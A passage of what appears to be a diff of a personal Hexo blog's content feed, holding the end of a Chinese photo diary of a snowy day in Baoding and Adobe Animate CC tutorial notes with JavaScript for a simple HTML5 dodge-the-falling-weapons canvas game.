    ​ 贯穿西大街再迂回至古莲花池,这段路我已经熟悉得不怎么依靠导航了。

    ​ 半路中三刷光园,很好它还是不开门。

    08:55 长信宫灯

    jpg

    ​ 总督署门口的假 · 长信宫灯。

    09:00 石狮

    jpg

    ​ 古莲花池门口的白头发石狮子。旁边一堆铲雪大爷大妈。

    09:01 三刷古莲花池

    jpg

    ​ 三刷古莲花池,¥30。售票员还说了一句今天应该会有很多人拍照😇。

    ​ 怪石上的积雪蛮好看的。

    09:04 直隶图书馆

    jpg

    ​ 直隶图书馆门口的白头发石狮子。

    09:05 桥与亭

    jpg

    ​ 又见面了,一桥和一亭!后来看别人的摄影作品感觉往后面走从门洞里面拍也不错,下次可以试试🤔。

    09:06 走廊

    jpg

    ​ 花花绿绿的走廊里,花白的走廊外。

    09:14 经典高手位

    jpg

    ​ 又来到了经典高手位,三刷古莲花池,三拍高手位。

    09:19 柳树下

    jpg

    ​ 新高手位——从柳树枝叶的缝隙间拍宛虹亭。

    09:22 观澜亭

    jpg

    ​ 白屋顶观澜。

    09:25 告辞!古莲花池!

    jpg

    ​ 走了两圈该撤了。

    09:34 天主教堂

    jpg

    ​ 来到了天主教堂!正门有个建筑物十分讨厌,只能从旁边开广角才能拍出教堂的全貌。

    ​ 天主教堂前面已经扫得很干净,很勤快啊!

    09:35 耶稣

    jpg

    ​ 雪松下的十字架。

    09:36 圣母玛丽亚

    jpg

    ​ 白雪包围的圣母玛利亚。

    09:38 十字架

    jpg

    ​ 积雪的十字架。

    09:45 大慈阁

    jpg

    ​ 再去看看大慈阁。之前听说大慈阁年久失修被取消了 AA 级景区评级,这次到门口直接关门不让进了😅。侧边拍一张,准备下一站——动物园!

    09:51 人民照像

    jpg

    ​ 再次横穿西大街。

    10:17 平房

    jpg

    ​ 前往动物园,途中护城河旁边的小巷子。

    ​ 动物园冷清得让我在外面看以为它关门了😇,后来才觉得很少会有傻子下雪天逛动物园,动物全在睡大觉。

    10:35 猴哥

    jpg

    ​ 吃雪的猴哥。

    jpg

    ​ 攀爬的猴哥。

    ​ 顺带一提,据说这个猴山非常牛逼,石头是从圆明园里搬出来的。

    10:37 别有洞天

    jpg

    ​ 鸟类馆里的别有洞天。

    10:39 鸟哥

    jpg

    ​ 雪地上的各种鹤。

    10:45 睡大觉哥

    jpg

    ​ 本来来动物园的目的就是能看老虎能在雪上漫步呢,好吧也想过它十有八九在睡大觉😅。

    jpg

    ​ 那就 P 一只老虎上去。

    10:49 保定古城墙

    jpg

    ​ 据说,动物园北边的墙是保定城的古城墙。

    10:50 城墙上

    jpg

    ​ 城墙上的积雪。

    10:53 二刷猴哥

    jpg

    ​ 这时候手机快没电了,注意到入口那里有个工作人员电瓶车充电桩,于是又回去偷偷充电。

    ​ 于是又见到你了!猴哥!

    ​ 逛完动物园差不多也该回去了,我想保定市区也就这些地方比较好玩了,极限半天速通保定!该回冀大了。

    11:58 狗子

    jpg

    ​ 冀大门口玩雪的狗子。

    12:23 银杏大道

    jpg

    ​ 被踩得稀烂的雪。

    12:24 松树

    jpg

    ​ 宿舍楼门口的松树。行了累了差不多该午睡了。

    ​ 舍友说下午带我堆雪人捏,我还特意看了网课——如何堆雪人:先揉一个雪球,然后在地上滚,越滚越大就行了。

    14:33 小雪人

    jpg

    ​ 已经到了下午了,看来上午有很多人已经堆起了雪人🤔。

    14:38 唐僧

    jpg

    ​ 抽烟的唐僧。

    14:40 大雪人

    jpg

    ​ 操场上居然有一人高的雪人,真是太牛逼了!

    ​ 试了一会儿没堆起来,而且我忘记戴手套了,太冷了,改打雪仗了。

    ​ 打不过,被解哥暴击😇。

    14:50 杰哥牌山西刀削面

    jpg

    ​ 杰哥用小刀把雪球削成方的,做了个骰子,结果一扔就散了。

    15:16 杰哥牌人工降雪

    jpg

    ​ 杰哥表演了一下人工降雪,用脚踢树,然后树下的人就会落汤鸡😇。

    jpg

    ​ 粉红仔解哥:🙂。

    总结

    jpg
    西大街 光园 古莲花池 直隶图书馆 宛虹亭 天主教堂 大慈阁 动物园 冀大
    jpg
    ]]>
    @@ -3785,7 +3785,7 @@ /posts/Software-AN/ - 资源

    哈喽!各位小可爱终于等到你这是【AN】已经跟新的课程的素材哦~本素材会陆续更新,小可爱们回复 AN 就可以获取~
    【0-1-AN 如何安装】-本节课没有素材哦~

    【0-2-AN 界面篇】-本节课没有素材哦,小伙伴们认真听 Genji 老师讲解并做笔记~

    【1-1-AN 如何绘制一个基础图案】链接:https://pan.baidu.com/s/14TM5wfdvy9i7whDBaMDu1A 提取码:0000

    【1-2-罗小黑逐帧动画是如何制作的】链接:https://pan.baidu.com/s/1fLM-oW_OpFQl538BpsK50w 提取码:0000

    【1-3-传统补间动画制作】
    【1-3.1-传统补间动画制作-开屏动画】
    【1-3.2-传统补间动画制作-闪耀字母】链接:https://pan.baidu.com/s/1jli9HpHcsfpa3GqekG8QMA 提取码:0000

    【2-1 引导层建立投篮动画】链接:https://pan.baidu.com/s/17wjkrLxZw3iJZ-Bz2N08ww 提取码:0000

    【2-2 遮罩图层建立地球仪】链接:https://pan.baidu.com/s/1RzEYYikYlysofgatX2ubvw 提取码:0000


    课程

    【0-2-AN先导课】- AN界面篇

    • F5 创建普通帧。

    • Shift + F5 删除帧。

    • F6 创建关键帧。

    • F7 创建空白关键帧。

    【1-1-AN入门课】- AN如何绘制一个基础图案

    png

    ​ 工程下新建一个帧,拖入素材,将这个图层锁了,再新建一个图层。

    png

    ​ 矩形工具按 Shift 拉一个正方形,颜色面板选择线性渐变,油漆桶拉上去。

    png

    ​ 钢笔工具扣一个"f",油漆桶图上白色。

    【1-2-AN入门课】- 罗小黑逐帧动画是如何制作的

    png

    ​ 导入多张图片,交叉操作按 F7 拖入图片将这些图片按顺序放在每一帧中。Alt + Shift + E 编辑多个帧。

    Ctrl + A 选择所有帧的图片。

    png

    ​ 使用对齐将它们对齐,拉到适应大小。

    png

    Ctrl + Enter 浏览动画。

    png

    ​ 减缓动画播放速度。选中某帧,按 F5 复制一个新的帧。

    gif

    ​ 最终效果。

    【1-3-AN入门课】- 传统补间动画制作

    png

    ​ 矩形工具拉一个正方形,F8 转换为图形元件。

    png

    ​ 在另一关键帧上随意变换这个元件。

    png

    ​ 在前一段关键帧中,创建传统补间

    png

    Ctrl + C 复制元件。

    Ctrl + Shift + V粘贴元件,且粘贴位置与复制帧的位置相同。

    gif

    ​ 最终效果。

    【1-3.1-AN练习课】- 传统补间动画制作开屏动画

    png

    ​ 选中传统补间动画的某一帧,可以修改补间的效果曲线。

    gif

    ​ 最终效果。

    【1-3.2-AN练习课】- 传统补间动画制作闪耀字母

    png

    ​ 文字工具打字,然后选中这个文字,Ctrl + B 将文字打散。

    png

    Ctrl + XCtrl + Shift + V 交替操作让各个字符处于各个图层中。

    png

    ​ 创建补间动画:

    • G 不透明度:100%-10%-50%-100%
    • E 不透明度:50%-100%-10%-50%
    • N 不透明度:10%-50%-100%-10%

    gif

    ​ 最终效果。

    【2-1-AN小白课】- 引导层建立投篮动画

    png

    ​ 导入篮球素材,转换为元件。

    png

    ​ 新建一个图层,用钢笔工具画一个路径。

    png

    ​ 将这个图层转换为引导层。

    png

    ​ 将篮球图层放到引导图层下面。

    png

    ​ 创建补间动画,设置补间效果,给它整一个逆时针 5 圈的旋转。

    gif

    ​ 最终效果。

    【2-2-AN小白课】- 遮罩图层建立地球仪

    png

    ​ 画布中新建一个图层,用椭圆工具画一个圆,放在地图动画的顶层,将这个图层设为遮罩层。

    gif

    ​ 最终效果。


    使用 AN 制作 HTML5 小游戏-教程 01【Adobe Animate CC】

    png

    ​ 新建一个 HTML5 Canvas 工程。

    png

    ​ 将临摹图导入工程中。

    png

    ​ 降低不透明度,上锁,再新建一个图层用于临摹。

    png

    ​ 用钢笔描绘人物,头,身体,手臂,手掌,臀部,腿,脚分别用 Ctrl + G 结组。

    ​ 双击某个组,可以单独编辑某个组。

    png

    ​ 用油漆桶工具一阵上色,如果发现某些区域上不了色,就检查路径是否闭合。

    使用 AN 制作 HTML5 小游戏-教程 02【Adobe Animate CC】

    png

    ​ 用各种工具描出背景。

    png

    ​ 给背景上色。关于阴影,可以先划线画出阴影区域,上色后再将线删去。

    png

    ​ 新建一个图层,画武器。

    png

    ​ 画按钮。转换成按钮元件。

    png

    ​ 转换后编辑它,会出现四个关键帧:弹起,指向,按下,点击。编辑它们。

    png

    ​ 水平翻转整一个左边的按钮。

    使用 AN 制作 HTML5 小游戏-教程 03【Adobe Animate CC】

    png

    ​ 使用 Ctrl + XCtrl + Shift + V 将人物各个部分放在各个图层中。

    png

    ​ 将人物各个部分转换为元件。

    png

    ​ 按 Q 键调整元件的轴心位置。

    png

    ​ 制作传统补间动画。

    png

    ​ 一阵操作。

    png

    ​ 最后将整个人物的锚点放到他的头顶上。

    使用 AN 制作 HTML5 小游戏-教程 04【Adobe Animate CC】

    png

    ​ 对于按钮,设置好它的名称。(this.leftthis.right

    png

    ​ 给人物设置一个影片剪辑,设置好它的名称。(this.player

    png

    ​ 打开 代码片断动作 窗口,设置按钮监听和人物绑定。

    var speed = 30;
    var isOnLeft = false;
    var isOnRight = false;
    var keyCode = 0;

    this.left.addEventListener("click", onLeft.bind(this));

    function onLeft()
    {
    isOnLeft = true;
    }

    this.right.addEventListener("click", onRight.bind(this));

    function onRight()
    {
    isOnRight = true;
    }

    this.player.addEventListener("tick", Update.bind(this));

    function Update()
    {
    Move(this.player);
    }

    document.addEventListener("keydown", function(e)
    {
    e = e || window.event;
    keyCode = e.keyCode || e.which || e.charCode;
    if(keyCode == 65) // A
    {
    isOnLeft = true;
    }
    if(keyCode == 68) // D
    {
    isOnRight = true;
    }
    })

    function Move(MC)
    {
    if(isOnLeft && MC.x > 250)
    {
    MC.x -= speed;
    }
    if(isOnRight && MC.x <= 1870)
    {
    MC.x += speed;
    }
    isOnLeft = isOnRight = false;
    }
    • click 表示按下时执行监听函数。
    • tick 表示随时随地执行监听函数。

    ​ 之后就是按下按钮(this.leftthis.right)/ 对应键盘 使得人物(this.player)移动的逻辑。

    使用 AN 制作 HTML5 小游戏-教程 05【Adobe Animate CC】

    png

    ​ 给这几个武器都设好影片剪辑和名称。(weapon1weapon2weapon3weapon4weapon5

    var speed = 30;
    var weaponSpeed = 30;
    var isOnLeft = false;
    var isOnRight = false;
    var keyCode = 0;

    this.left.addEventListener("click", onLeft.bind(this));

    function onLeft()
    {
    isOnLeft = true;
    }

    this.right.addEventListener("click", onRight.bind(this));

    function onRight()
    {
    isOnRight = true;
    }

    this.player.addEventListener("tick", Update.bind(this));

    function Update()
    {
    Move(this.player);
    Weapon(this.weapon1, this.player);
    Weapon(this.weapon2, this.player);
    Weapon(this.weapon3, this.player);
    Weapon(this.weapon4, this.player);
    Weapon(this.weapon5, this.player);
    }

    document.addEventListener("keydown", function(e)
    {
    e = e || window.event;
    keyCode = e.keyCode || e.which || e.charCode;
    if(keyCode == 65) // A
    {
    isOnLeft = true;
    }
    if(keyCode == 68) // D
    {
    isOnRight = true;
    }
    })

    function Move(MC)
    {
    if(isOnLeft && MC.x > 250)
    {
    MC.x -= speed;
    }
    if(isOnRight && MC.x <= 1870)
    {
    MC.x += speed;
    }
    isOnLeft = isOnRight = false;
    }

    function Weapon(WE, MC)
    {
    if(WE.x >= MC.x - 160 && WE.x <= MC.x + 160 && WE.y >= MC.y && WE.y <= MC.y + 400) // 碰撞检测
    {
    WE.y = -200;
    WE.x = Math.random() * 1870;
    }
    if(WE.y >= 1000) // 掉出界外
    {
    WE.y = -200;
    WE.x = Math.random() * 1870;
    }
    else // 武器下落
    {
    WE.y += weaponSpeed;
    }
    }

    ​ 写好武器下落的逻辑。

    png

    ​ 可以给背景底端分离出一个图层在道具图层上方,以实现武器落入地表中的效果。

    使用 AN 制作 HTML5 小游戏-教程 06【Adobe Animate CC】

    png

    ​ 新建一个图层,制作 restart 按钮。

    png

    png

    ​ 命名为 restart

    var speed = 30;
    var weaponSpeed = 30;
    var isOnLeft = false;
    var isOnRight = false;
    var keyCode = 0;
    var alive = true;

    this.left.addEventListener("click", onLeft.bind(this));

    function onLeft()
    {
    isOnLeft = true;
    }

    this.right.addEventListener("click", onRight.bind(this));

    function onRight()
    {
    isOnRight = true;
    }

    this.restart.addEventListener("click", onRestart.bind(this));

    function onRestart()
    {
    alive = true;
    this.weapon1.y = this.weapon2.y = this.weapon2.y = this.weapon3.y = this.weapon4.y = this.weapon5.y = -200;
    this.weapon1.x = Math.random() * 1870;
    this.weapon2.x = Math.random() * 1870;
    this.weapon3.x = Math.random() * 1870;
    this.weapon4.x = Math.random() * 1870;
    this.weapon5.x = Math.random() * 1870;
    }

    this.player.addEventListener("tick", Update.bind(this));

    function Update()
    {
    if(alive)
    {
    Move(this.player);
    Weapon(this.weapon1, this.player);
    Weapon(this.weapon2, this.player);
    Weapon(this.weapon3, this.player);
    Weapon(this.weapon4, this.player);
    Weapon(this.weapon5, this.player);
    this.restart.y = -400;
    }else
    {
    this.restart.y = 350;
    }

    }

    document.addEventListener("keydown", function(e)
    {
    e = e || window.event;
    keyCode = e.keyCode || e.which || e.charCode;
    if(keyCode == 65) // A
    {
    isOnLeft = true;
    }
    if(keyCode == 68) // D
    {
    isOnRight = true;
    }
    })

    function Move(MC)
    {
    if(isOnLeft && MC.x > 250)
    {
    MC.x -= speed;
    }
    if(isOnRight && MC.x <= 1870)
    {
    MC.x += speed;
    }
    isOnLeft = isOnRight = false;
    }

    function Weapon(WE, MC)
    {
    if(WE.x >= MC.x - 160 && WE.x <= MC.x + 160 && WE.y >= MC.y && WE.y <= MC.y + 400) // 碰撞检测
    {
    alive = false;
    WE.y = -200;
    WE.x = Math.random() * 1870;
    }
    if(WE.y >= 1000) // 掉出界外
    {
    WE.y = -200;
    WE.x = Math.random() * 1870;
    }
    else
    {
    WE.y += weaponSpeed;
    }
    }

    ​ 使用代码设置按钮监听。

    if(alive)
    {
    Move(this.player);
    Weapon(this.weapon1, this.player);
    Weapon(this.weapon2, this.player);
    Weapon(this.weapon3, this.player);
    Weapon(this.weapon4, this.player);
    Weapon(this.weapon5, this.player);
    this.restart.y = -400;
    }else
    {
    this.restart.y = 350;
    }

    ​ 没挂的时候隐藏 restart 按钮,挂的时候显示 restart 按钮。

    function onRestart()
    {
    alive = true;
    this.weapon1.y = this.weapon2.y = this.weapon2.y = this.weapon3.y = this.weapon4.y = this.weapon5.y = -200;
    this.weapon1.x = Math.random() * 1870;
    this.weapon2.x = Math.random() * 1870;
    this.weapon3.x = Math.random() * 1870;
    this.weapon4.x = Math.random() * 1870;
    this.weapon5.x = Math.random() * 1870;
    }

    ​ 重置游戏的逻辑。

    使用 AN 制作 HTML5 小游戏-教程 07【Adobe Animate CC】

    png

    ​ 新建一个图层,新建一个文本对象,设为 动态文本,然后将对象命名为 scoreText

    png

    ​ 给人物移动动画最顶端加一个图层,用于放代码,前面几帧设置标签名 run

    png

    ​ 最后在尾巴新建一个关键帧,命名为 end

    png

    ​ 第 20 帧设置代码 this.gotoAndPlay("run"),表示到这一帧后回到第 0 帧重新播放。

    png

    ​ 第 21 帧设置代码 this.stop(),表示停止动画。

    png

    ​ 在第 21 帧,选中人头的图层,Ctrl + B 分离后,画一个被击中的表情。

    var speed = 30;
    var weaponSpeed = 30;
    var isOnLeft = false;
    var isOnRight = false;
    var keyCode = 0;
    var alive = true;
    var score = 0;

    this.left.addEventListener("click", onLeft.bind(this));

    function onLeft()
    {
    isOnLeft = true;
    }

    this.right.addEventListener("click", onRight.bind(this));

    function onRight()
    {
    isOnRight = true;
    }

    this.restart.addEventListener("click", onRestart.bind(this));

    function onRestart()
    {
    alive = true;
    this.weapon1.y = this.weapon2.y = this.weapon2.y = this.weapon3.y = this.weapon4.y = this.weapon5.y = -200;
    this.weapon1.x = Math.random() * 1870;
    this.weapon2.x = Math.random() * 1870;
    this.weapon3.x = Math.random() * 1870;
    this.weapon4.x = Math.random() * 1870;
    this.weapon5.x = Math.random() * 1870;
    score = 0;
    this.player.gotoAndPlay("run");
    }

    this.player.addEventListener("tick", Update.bind(this));

    function Update()
    {
    this.scoreText.text = "Score: " + score;
    if(alive)
    {
    Move(this.player);
    Weapon(this.weapon1, this.player);
    Weapon(this.weapon2, this.player);
    Weapon(this.weapon3, this.player);
    Weapon(this.weapon4, this.player);
    Weapon(this.weapon5, this.player);
    this.restart.y = -400;
    }else
    {
    this.restart.y = 350;
    }

    }

    document.addEventListener("keydown", function(e)
    {
    e = e || window.event;
    keyCode = e.keyCode || e.which || e.charCode;
    if(keyCode == 65) // A
    {
    isOnLeft = true;
    }
    if(keyCode == 68) // D
    {
    isOnRight = true;
    }
    })

    function Move(MC)
    {
    if(isOnLeft && MC.x > 250)
    {
    MC.x -= speed;
    }
    if(isOnRight && MC.x <= 1870)
    {
    MC.x += speed;
    }
    isOnLeft = isOnRight = false;
    }

    function Weapon(WE, MC)
    {
    if(WE.x >= MC.x - 160 && WE.x <= MC.x + 160 && WE.y >= MC.y && WE.y <= MC.y + 400) // 碰撞检测
    {
    alive = false;
    WE.y = -200;
    WE.x = Math.random() * 1870;
    MC.gotoAndStop("end");
    }
    if(WE.y >= 1000) // 掉出界外
    {
    score += 1;
    WE.y = -200;
    WE.x = Math.random() * 1870;
    }
    else
    {
    WE.y += weaponSpeed;
    }
    }

    ​ 最终代码。

    • 主要就是重新开始时:this.player.gotoAndPlay("run"),恢复人物动画。

    • 碰到武器时:MC.gotoAndStop("end");,跳到第 21 帧。


    ​ 最终效果。可以在 hexo 上跑,但是当时画布设置的太大了 orz……


    ​ 修改画布大小,网页中:

    • 因为新建的画布是 16:9 的,所以宽度设为 100%,画布 padding-bottom 设为 56.25%(代替 height):
    • margin: 0 auto; 居中对齐。
    <!-- write your code here -->
    <body onload="init();" style="margin:0px;">
    <div id="animation_container" style="background-color:rgba(255, 255, 255, 1.00); width:100%;padding-bottom: 56.25%;height: 0;margin: 0 auto;">
    <canvas id="canvas" width="1920" height="1080" style=";margin: 0 auto;display: block; background-color:rgba(255, 255, 255, 1.00);"></canvas>
    <div id="dom_overlay_container" style="pointer-events:none; overflow:hidden; width:1920px; height:1080px; position: absolute; left: 0px; top: 0px; display: block;">
    </div>
    </div>
    </body>

    ​ Game.js 中:

    domContainers.forEach(function(container) {
    container.style.width = '100%';
    });

    ​ 开跑!


    ]]>
    + 资源

    哈喽!各位小可爱终于等到你这是【AN】已经跟新的课程的素材哦~本素材会陆续更新,小可爱们回复 AN 就可以获取~
    【0-1-AN 如何安装】-本节课没有素材哦~

    【0-2-AN 界面篇】-本节课没有素材哦,小伙伴们认真听 Genji 老师讲解并做笔记~

    【1-1-AN 如何绘制一个基础图案】链接:https://pan.baidu.com/s/14TM5wfdvy9i7whDBaMDu1A 提取码:0000

    【1-2-罗小黑逐帧动画是如何制作的】链接:https://pan.baidu.com/s/1fLM-oW_OpFQl538BpsK50w 提取码:0000

    【1-3-传统补间动画制作】
    【1-3.1-传统补间动画制作-开屏动画】
    【1-3.2-传统补间动画制作-闪耀字母】链接:https://pan.baidu.com/s/1jli9HpHcsfpa3GqekG8QMA 提取码:0000

    【2-1 引导层建立投篮动画】链接:https://pan.baidu.com/s/17wjkrLxZw3iJZ-Bz2N08ww 提取码:0000

    【2-2 遮罩图层建立地球仪】链接:https://pan.baidu.com/s/1RzEYYikYlysofgatX2ubvw 提取码:0000


    课程

    【0-2-AN先导课】- AN界面篇

    • F5 创建普通帧。

    • Shift + F5 删除帧。

    • F6 创建关键帧。

    • F7 创建空白关键帧。

    【1-1-AN入门课】- AN如何绘制一个基础图案

    png

    ​ 工程下新建一个帧,拖入素材,将这个图层锁了,再新建一个图层。

    png

    ​ 矩形工具按 Shift 拉一个正方形,颜色面板选择线性渐变,油漆桶拉上去。

    png

    ​ 钢笔工具扣一个"f",油漆桶图上白色。

    【1-2-AN入门课】- 罗小黑逐帧动画是如何制作的

    png

    ​ 导入多张图片,交叉操作按 F7 拖入图片将这些图片按顺序放在每一帧中。Alt + Shift + E 编辑多个帧。

    Ctrl + A 选择所有帧的图片。

    png

    ​ 使用对齐将它们对齐,拉到适应大小。

    png

    Ctrl + Enter 浏览动画。

    png

    ​ 减缓动画播放速度。选中某帧,按 F5 复制一个新的帧。

    gif

    ​ 最终效果。

    【1-3-AN入门课】- 传统补间动画制作

    png

    ​ 矩形工具拉一个正方形,F8 转换为图形元件。

    png

    ​ 在另一关键帧上随意变换这个元件。

    png

    ​ 在前一段关键帧中,创建传统补间

    png

    Ctrl + C 复制元件。

    Ctrl + Shift + V粘贴元件,且粘贴位置与复制帧的位置相同。

    gif

    ​ 最终效果。

    【1-3.1-AN练习课】- 传统补间动画制作开屏动画

    png

    ​ 选中传统补间动画的某一帧,可以修改补间的效果曲线。

    gif

    ​ 最终效果。

    【1-3.2-AN练习课】- 传统补间动画制作闪耀字母

    png

    ​ 文字工具打字,然后选中这个文字,Ctrl + B 将文字打散。

    png

    Ctrl + XCtrl + Shift + V 交替操作让各个字符处于各个图层中。

    png

    ​ 创建补间动画:

    • G 不透明度:100%-10%-50%-100%
    • E 不透明度:50%-100%-10%-50%
    • N 不透明度:10%-50%-100%-10%

    gif

    ​ 最终效果。

    【2-1-AN小白课】- 引导层建立投篮动画

    png

    ​ 导入篮球素材,转换为元件。

    png

    ​ 新建一个图层,用钢笔工具画一个路径。

    png

    ​ 将这个图层转换为引导层。

    png

    ​ 将篮球图层放到引导图层下面。

    png

    ​ 创建补间动画,设置补间效果,给它整一个逆时针 5 圈的旋转。

    gif

    ​ 最终效果。

    【2-2-AN小白课】- 遮罩图层建立地球仪

    png

    ​ 画布中新建一个图层,用椭圆工具画一个圆,放在地图动画的顶层,将这个图层设为遮罩层。

    gif

    ​ 最终效果。


    使用 AN 制作 HTML5 小游戏-教程 01【Adobe Animate CC】

    png

    ​ 新建一个 HTML5 Canvas 工程。

    png

    ​ 将临摹图导入工程中。

    png

    ​ 降低不透明度,上锁,再新建一个图层用于临摹。

    png

    ​ 用钢笔描绘人物,头,身体,手臂,手掌,臀部,腿,脚分别用 Ctrl + G 结组。

    ​ 双击某个组,可以单独编辑某个组。

    png

    ​ 用油漆桶工具一阵上色,如果发现某些区域上不了色,就检查路径是否闭合。

    使用 AN 制作 HTML5 小游戏-教程 02【Adobe Animate CC】

    png

    ​ 用各种工具描出背景。

    png

    ​ 给背景上色。关于阴影,可以先划线画出阴影区域,上色后再将线删去。

    png

    ​ 新建一个图层,画武器。

    png

    ​ 画按钮。转换成按钮元件。

    png

    ​ 转换后编辑它,会出现四个关键帧:弹起,指向,按下,点击。编辑它们。

    png

    ​ 水平翻转整一个左边的按钮。

    使用 AN 制作 HTML5 小游戏-教程 03【Adobe Animate CC】

    png

    ​ 使用 Ctrl + XCtrl + Shift + V 将人物各个部分放在各个图层中。

    png

    ​ 将人物各个部分转换为元件。

    png

    ​ 按 Q 键调整元件的轴心位置。

    png

    ​ 制作传统补间动画。

    png

    ​ 一阵操作。

    png

    ​ 最后将整个人物的锚点放到他的头顶上。

    使用 AN 制作 HTML5 小游戏-教程 04【Adobe Animate CC】

    png

    ​ 对于按钮,设置好它的名称。(this.leftthis.right

    png

    ​ 给人物设置一个影片剪辑,设置好它的名称。(this.player

    png

    ​ 打开 代码片断动作 窗口,设置按钮监听和人物绑定。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    var speed = 30;
    var isOnLeft = false;
    var isOnRight = false;
    var keyCode = 0;

    this.left.addEventListener("click", onLeft.bind(this));

    function onLeft()
    {
    isOnLeft = true;
    }

    this.right.addEventListener("click", onRight.bind(this));

    function onRight()
    {
    isOnRight = true;
    }

    this.player.addEventListener("tick", Update.bind(this));

    function Update()
    {
    Move(this.player);
    }

    document.addEventListener("keydown", function(e)
    {
    e = e || window.event;
    keyCode = e.keyCode || e.which || e.charCode;
    if(keyCode == 65) // A
    {
    isOnLeft = true;
    }
    if(keyCode == 68) // D
    {
    isOnRight = true;
    }
    })

    function Move(MC)
    {
    if(isOnLeft && MC.x > 250)
    {
    MC.x -= speed;
    }
    if(isOnRight && MC.x <= 1870)
    {
    MC.x += speed;
    }
    isOnLeft = isOnRight = false;
    }
    • click 表示按下时执行监听函数。
    • tick 表示随时随地执行监听函数。

    ​ 之后就是按下按钮(this.leftthis.right)/ 对应键盘 使得人物(this.player)移动的逻辑。

    使用 AN 制作 HTML5 小游戏-教程 05【Adobe Animate CC】

    png

    ​ 给这几个武器都设好影片剪辑和名称。(weapon1weapon2weapon3weapon4weapon5

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    var speed = 30;
    var weaponSpeed = 30;
    var isOnLeft = false;
    var isOnRight = false;
    var keyCode = 0;

    this.left.addEventListener("click", onLeft.bind(this));

    function onLeft()
    {
    isOnLeft = true;
    }

    this.right.addEventListener("click", onRight.bind(this));

    function onRight()
    {
    isOnRight = true;
    }

    this.player.addEventListener("tick", Update.bind(this));

    function Update()
    {
    Move(this.player);
    Weapon(this.weapon1, this.player);
    Weapon(this.weapon2, this.player);
    Weapon(this.weapon3, this.player);
    Weapon(this.weapon4, this.player);
    Weapon(this.weapon5, this.player);
    }

    document.addEventListener("keydown", function(e)
    {
    e = e || window.event;
    keyCode = e.keyCode || e.which || e.charCode;
    if(keyCode == 65) // A
    {
    isOnLeft = true;
    }
    if(keyCode == 68) // D
    {
    isOnRight = true;
    }
    })

    function Move(MC)
    {
    if(isOnLeft && MC.x > 250)
    {
    MC.x -= speed;
    }
    if(isOnRight && MC.x <= 1870)
    {
    MC.x += speed;
    }
    isOnLeft = isOnRight = false;
    }

    function Weapon(WE, MC)
    {
    if(WE.x >= MC.x - 160 && WE.x <= MC.x + 160 && WE.y >= MC.y && WE.y <= MC.y + 400) // 碰撞检测
    {
    WE.y = -200;
    WE.x = Math.random() * 1870;
    }
    if(WE.y >= 1000) // 掉出界外
    {
    WE.y = -200;
    WE.x = Math.random() * 1870;
    }
    else // 武器下落
    {
    WE.y += weaponSpeed;
    }
    }

    ​ 写好武器下落的逻辑。

    png

    ​ 可以给背景底端分离出一个图层在道具图层上方,以实现武器落入地表中的效果。

    使用 AN 制作 HTML5 小游戏-教程 06【Adobe Animate CC】

    png

    ​ 新建一个图层,制作 restart 按钮。

    png

    png

    ​ 命名为 restart

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    var speed = 30;
    var weaponSpeed = 30;
    var isOnLeft = false;
    var isOnRight = false;
    var keyCode = 0;
    var alive = true;

    this.left.addEventListener("click", onLeft.bind(this));

    function onLeft()
    {
    isOnLeft = true;
    }

    this.right.addEventListener("click", onRight.bind(this));

    function onRight()
    {
    isOnRight = true;
    }

    this.restart.addEventListener("click", onRestart.bind(this));

    function onRestart()
    {
    alive = true;
    this.weapon1.y = this.weapon2.y = this.weapon2.y = this.weapon3.y = this.weapon4.y = this.weapon5.y = -200;
    this.weapon1.x = Math.random() * 1870;
    this.weapon2.x = Math.random() * 1870;
    this.weapon3.x = Math.random() * 1870;
    this.weapon4.x = Math.random() * 1870;
    this.weapon5.x = Math.random() * 1870;
    }

    this.player.addEventListener("tick", Update.bind(this));

    function Update()
    {
    if(alive)
    {
    Move(this.player);
    Weapon(this.weapon1, this.player);
    Weapon(this.weapon2, this.player);
    Weapon(this.weapon3, this.player);
    Weapon(this.weapon4, this.player);
    Weapon(this.weapon5, this.player);
    this.restart.y = -400;
    }else
    {
    this.restart.y = 350;
    }

    }

    document.addEventListener("keydown", function(e)
    {
    e = e || window.event;
    keyCode = e.keyCode || e.which || e.charCode;
    if(keyCode == 65) // A
    {
    isOnLeft = true;
    }
    if(keyCode == 68) // D
    {
    isOnRight = true;
    }
    })

    function Move(MC)
    {
    if(isOnLeft && MC.x > 250)
    {
    MC.x -= speed;
    }
    if(isOnRight && MC.x <= 1870)
    {
    MC.x += speed;
    }
    isOnLeft = isOnRight = false;
    }

    function Weapon(WE, MC)
    {
    if(WE.x >= MC.x - 160 && WE.x <= MC.x + 160 && WE.y >= MC.y && WE.y <= MC.y + 400) // 碰撞检测
    {
    alive = false;
    WE.y = -200;
    WE.x = Math.random() * 1870;
    }
    if(WE.y >= 1000) // 掉出界外
    {
    WE.y = -200;
    WE.x = Math.random() * 1870;
    }
    else
    {
    WE.y += weaponSpeed;
    }
    }

    ​ 使用代码设置按钮监听。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    if(alive)
    {
    Move(this.player);
    Weapon(this.weapon1, this.player);
    Weapon(this.weapon2, this.player);
    Weapon(this.weapon3, this.player);
    Weapon(this.weapon4, this.player);
    Weapon(this.weapon5, this.player);
